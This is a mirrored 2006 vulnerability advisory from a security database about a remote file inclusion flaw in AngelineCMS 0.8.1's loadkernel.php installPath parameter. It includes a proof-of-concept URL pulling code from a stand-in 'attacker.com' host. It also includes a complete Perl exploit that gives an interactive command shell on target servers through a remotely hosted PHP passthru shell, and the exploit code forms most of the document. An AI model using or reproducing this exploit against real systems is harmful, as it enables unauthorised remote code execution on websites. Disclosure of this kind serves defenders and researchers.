Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12088
HistoryApr 05, 2006 - 12:00 a.m.

[ECHO_ADV_27$2006] AngelineCMS 0.8.1 Installpath Remote File Inclusion

2006-04-0500:00:00
vulners.com
16
JSON

\_ /\ ___ \ / | \\_ \
| ) / \ \// ~ \/ | \
| \\ \\ Y / | \
/_____ / \______ /\| /\_____ /
\/ \/ \/ \/

                                    .OR.ID

ECHO_ADV_27$2006

[ECHO_ADV_27$2006] AngelineCMS 0.8.1 Installpath Remote File Inclusion

Author : M.Hasran Addahroni
Date : April, 4th 2006
Location : Indonesia, Bali
Web : http://advisories.echo.or.id/adv/adv27-K-159-2006.txt
Critical Lvl : Dangerous

Affected software description:

Indexu

Application : AngelineCMS 
version     : 0.8.1
URL         : http://angelinecms.info/
Description :

AngelineCMS is an open source Content Management System (CMS) and a complete Web Development Framework (Application server). It's written from ground up to take advance of PHP5's object-oriented features. AngelineCMS is Open Source software under OSI approved Mozilla Public License. AngelineCMS aims for easy, innovative solutions for daily web publishing problems. 

---------------------------------------------------------------------------

Proof of Concept:
~~~~~~~~~~~~~~~~
Vulnerable Script: loadkernel.php in kernel folder.

---------------loadkernel.php--------------------------------
...
include_once($installPath."/kernel/common/time.php");
...
------------------------------------------------------------------

Variables $installpath are not properly sanitized.When register_globals=on and allow_fopenurl=on an attacker can exploit this vulnerability with a simple php injection script.

Poc/Exploit:
~~~~~~~~~~~~

http://www.target.com/[angelinecms_path]/kernel/loadkernel.php?installPath=http://attacker.com/evil?

Solution:
~~~~~~~~~

sanitize the script code in loadkernel.php to protect this vulerability

Notification:
~~~~~~~~~~~~

 vendor was contact

---------------------------------------------------------------------------
Shoutz:
~~~~~~~

~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous,kaiten
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,an0maly,fleanux,baylaw
~ sinChan,x`shell,tety,sakitjiwa, m_beben, rizal, cR4SH3R, metalsploit
~ [email protected] 
~ #aikmel #e-c-h-o @irc.dal.net
---------------------------------------------------------------------------
Contact:
~~~~~~~~

     K-159 || echo|staff || eufrato[at]gmail[dot]com
     Homepage: http://k-159.echo.or.id/

-------------------------------- [ EOF ] ----------------------------------

Perl Exploit:
~~~~~~~~~~~~

#!/usr/bin/perl
##
# AngelineCMS 0.8.1 installpath Remote Code Execution Exploit
# Bug Found & code By K-159 
# code reference from uid0/zod at ExploiterCode.com
##
# echo.or.id (c) 2006
# 
##
# usage:
# perl angelineCMS.pl <target> <cmd shell location> <cmd shell variable>
#
# perl angelineCMS.pl http://target.com/ http://site.com/cmd.txt cmd
#
# cmd shell example: <?passthru($_GET[cmd]);?>
#
# cmd shell variable: ($_GET[cmd]);
##
# #
# 
# Contact: www.echo.or.id #e-c-h-o @irc.dal.net
##

use LWP::UserAgent;

$Path = $ARGV[0];
$Pathtocmd = $ARGV[1];
$cmdv = $ARGV[2];

if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}

head();

while()
{
       print "[shell] \$";
while(<STDIN>)
       {
               $cmd=$_;
               chomp($cmd);

$xpl = LWP::UserAgent->new() or die;
$req = HTTP::Request->new(GET =>$Path.'kernel/loadkernel.php?installPath='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n";

$res = $xpl->request($req);
$return = $res->content;
$return =~ tr/[\n]/[ΠΊ]/;

if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";}

elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in <b>/)
       {print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit}
elsif ($return =~/^<br.\/>.<b>Fatal.error/) {print "\nInvalid Command or No Return\n\n"}

if($return =~ /(.*)/)


{
       $finreturn = $1;
       $finreturn=~ tr/[ΠΊ]/[\n]/;
       print "\r\n$finreturn\n\r";
       last;
}

else {print "[shell] \$";}}}last;

sub head()
 {
 print "\n============================================================================\r\n";
 print " *AngelineCMS 0.8.1 installpath Remote Code Execution Exploit*\r\n";
 print "============================================================================\r\n";
 }
sub usage()
 {
 head();
 print " Usage: perl angelineCMS.pl <target> <cmd shell location> <cmd shell variable>\r\n\n";
 print " <Site> - Full path to angelineCMS ex: http://www.site.com/ \r\n";
 print " <cmd shell> - Path to cmd Shell e.g http://www.different-site.com/cmd.txt \r\n";
 print " <cmd variable> - Command variable used in php shell \r\n";
 print "============================================================================\r\n";
 print "                           Bug Found by K-159 \r\n";
 print "                    www.echo.or.id #e-c-h-o irc.dal.net \r\n";
 print "============================================================================\r\n";
 exit();
 }
JSON